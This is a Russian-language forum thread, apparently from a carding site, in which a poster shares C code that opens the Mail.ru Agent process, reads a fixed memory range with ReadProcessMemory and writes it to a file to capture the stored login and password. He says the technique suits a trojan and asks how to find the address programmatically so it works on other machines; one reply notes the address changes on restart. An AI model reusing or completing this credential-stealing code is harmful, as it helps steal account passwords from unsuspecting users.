Недавно наткнулся вот на это (http://ccbastards.org/index.php?module=notes&do=show&id=13)


Это рально или так очередной понт?

2 года уже неактуально

прикольная темка не буду создавать новой
спрошу свой вопрос

Делать мне нечего пытаюсь из памяти процесса маил агента выцепить данные о мыле и пароле. Посмотрел в оли дебаг и в артмани и выяснил что они где то тут 0x011B2000 - 0x011B3000 (до это выяснял как делать карту памяти процессов ниче полезного)

лано выяснил сделал!


unsigned char *mem;
DWORD st_addr=0x011B2000;
HANDLE hProcess;
HFILE f;

// эт моя фуекция через ToolHelp Process32First
if((thPID=GetPIDbyNameExe((char *)&szExE))==-1){ExitProcess(1); }

hProcess=OpenProcess(PROCESS_VM_READ,FALSE,thPID);

mem=(unsigned char *)LocalAlloc(LPTR,4096);

ReadProcessMemory(hProcess,(LPCVOID)st_addr,mem,40 96,NULL);

f=_lcreat("d.txt", 0);
_lwrite(f,(LPCCH)mem,4096);
_lclose(f);

LocalFree(mem);
CloseHandle(hProcess);
ExitProcess(0);

ну запускаю смотрю файлик лежат логин пасс )

даю друзякам тестить хер... ну понятно адреса то разные

вопрос че делать???
я уже тут перечитал структуру PE заголовка научился выциплять образ exe из памяти )
делать карту памяти процесса .... но блин я хз в общем как артмани этот ищет какашко :(

а так тема же клевая особено в троянчек
из памяти прог цеплять данные крута.

Ну очевидно, что программа может
расположится в памяти по предпочтительному
адресупосмотри в ArtMoney, адрес
изменяется с каждым перезапуском агента!

эммм типа вопрос как программно вычислить этот адресс
это понятно что он изменяется... как его находить ?

включать артмани смотреть и перекомпилировать не катит )